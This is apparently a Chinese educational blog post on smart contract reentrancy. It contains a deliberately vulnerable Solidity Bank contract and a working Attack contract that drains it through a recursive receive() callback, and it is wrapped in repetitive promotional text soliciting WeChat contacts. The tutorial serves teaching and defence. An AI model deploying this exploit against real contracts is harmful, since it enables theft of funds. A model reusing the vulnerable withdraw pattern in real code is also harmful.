合约安全：重入攻击，扫地阿姨看完都学会了

先自我介绍一下，小编浙江大学毕业，去过华为、字节跳动等大厂，目前阿里P7

深知大多数程序员，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年最新网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新

如果你需要这些资料，可以添加V获取：vip204888 （备注网络安全）

正文

重入攻击是智能合约中最常见的一种攻击，攻击者通过合约漏洞（例如fallback函数）循环调用合约，将合约中资产转走或铸造大量代币。

重入攻击举例

与web2.0中的重放攻击导致的逻辑漏洞类似，当用户向合约提现时，正常情况如下

• 用户向合约发起请求提现
• 合约检测该用户是否有足够的余额，有的话进行转账
• 转账成功，用户余额置为0
  相信大家已经看出问题了：转账后才将用户的余额置为0，如果我们能做到像web2.0一样在短时间内不断的发包，在置为0前不断的触发转账函数即可做到将大量的钱转走。因此，我们可以写一个恶意合约来完成我们的设想

思路

• 用户发起提现请求
• 合约检测用户余额，向用户提供的提现地址转账
• 通过向恶意合约转账。触发恶意fallback()/recevie()函数，该函数的内容为请求合约向合约转账。就此，陷入转账的循环，却一直没有到将用户余额置0的那行

/*`    `那个函数被调用了?  是 fallback() 还是 receive()?``   `              `send Ether`                      `|`         `msg.data  是否为空?`              `/              \`            `是              否`            `/                   \``receive() 存在?       fallback()`         `/            \`        `是           否`        `/                \`    `receive()   fallback()`    `*/

实例

预备阶段

bank合约

contract Bank {`    `mapping (address => uint256) public balanceOf;    // 余额mapping``   `    `// 存入ether，并更新余额`    `function deposit() external payable {`        `balanceOf[msg.sender] += msg.value;`    `}``   `    `// 提取msg.sender的全部ether`    `function withdraw() external {`        `uint256 balance = balanceOf[msg.sender]; // 获取余额`        `require(balance > 0, "Insufficient balance");`        `// 转账 ether !!! 可能激活恶意合约的fallback/receive函数，有重入风险！`        `(bool success, ) = msg.sender.call{value: balance}("");`        `require(success, "Failed to send Ether");`        `// 更新余额`        `balanceOf[msg.sender] = 0;`    `}``   `    `// 获取银行合约的余额`    `function getBalance() external view returns (uint256) {`        `return address(this).balance;`    `}

往银行先转个20eth

部署Attack合约

contract Attack {`    `Bank public bank; // Bank合约地址`    `// 初始化Bank合约地址`    `constructor(Bank _bank) {`        `bank = _bank;`    `}`    `    // 回调函数，用于重入攻击Bank合约，反复的调用目标的withdraw函数`    `receive() external payable {`        `if (bank.getBalance() >= 1 ether) {`            `bank.withdraw();`        `}`    `}`    `// 攻击函数，调用时 msg.value 设为 1 ether`    `function attack() external payable {`        `require(msg.value == 2 ether, "Require 1 Ether to attack");`        `bank.deposit{value: 2 ether}();`        `bank.withdraw();`    `}`    `// 获取本合约的余额`    `function getBalance() external view returns (uint256) {`        `return address(this).balance;`    `}``}

开始攻击

因为Attack合约中，构造函数已经初始化了Bank，因此，直接传入Bank地址创建该Attack合约

目前该Attack合约没有钱，调用attack方法的时候记得转2eth过去
调用attack方法后，Attack合约余额变为了22eth，banck余额为0

`**黑客&网络安全如何学习**

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。

1.学习路线图

攻击和防守要学的东西也不少，具体要学的东西我都写在了上面的路线图，如果你能学完它们，你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等，都是网络安全入门必知必会的学习内容。

写在最后

在结束之际，我想重申的是，学习并非如攀登险峻高峰，而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后，持之以恒的学习变得愈发不易，如同在茫茫大海中独自划舟，稍有松懈便可能被巨浪吞噬。然而，对于我们程序员而言，学习是生存之本，是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习，我们便如同逆水行舟，不进则退，终将被时代的洪流所淘汰。因此，不断汲取新知识，不仅是对自己的提升，更是对自己的一份珍贵投资。让我们不断磨砺自己，与时代共同进步，书写属于我们的辉煌篇章。

需要完整版PDF学习资源私我

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化的资料的朋友，可以添加V获取：vip204888 （备注网络安全）

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

[外链图片转存中…(img-1M7Y8h2L-1713544492606)]

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！